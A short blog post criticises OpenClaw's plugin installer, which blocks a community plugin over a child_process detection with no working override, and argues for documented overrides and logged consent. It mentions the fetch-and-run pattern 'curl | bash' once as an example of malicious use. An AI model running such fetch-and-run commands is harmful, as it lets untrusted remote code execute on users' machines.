Here's a frustrating scenario: you find a community plugin that does exactly what you need. You run openclaw plugins install. And the install is blocked.
WARNING: Plugin "openclaw-codex-app-server" contains dangerous code patterns:
Shell command execution detected (child_process) (src/client.ts:660)
Plugin installation blocked: dangerous code patterns detected
No override flag works. The --dangerously-force-unsafe-install flag — blocked too. The --trust flag that community docs reference? Doesn't exist.
This is a textbook case of a security mechanism that's correct in principle but broken in practice.
The Tension
The plugin uses child_process because that's literally its job — spawning coding CLIs. OpenClaw's static analysis catches it and blocks installation. Fair enough, given past incidents with malicious skills.
But the gate has no key. No sanctioned way to say "I reviewed this, I accept the risk."
Three Design Principles This Violates
1. Flags should do what their names say. --dangerously-force-unsafe-install is explicit consent. If it doesn't work, why exist?
2. Security defaults should have documented overrides. Secure by default, configurable by choice. When the override is undocumented, users give up or find worse workarounds.
3. Static pattern matching has limits. Blocking child_process at string level catches malicious and legitimate uses equally. A plugin spawning codex is different from one running curl | bash.
What Good Looks Like
npm, VS Code, Docker, Homebrew — they all follow the same pattern: warn loudly, document the override, log the decision.
Takeaway
- Every deny must have a documented allow
- Override flags must actually override
- Static analysis needs a consent layer
- Log trust decisions for your audit trail
The goal isn't to remove the gate. It's to put a lock on it and give the user the key.
Top comments (0)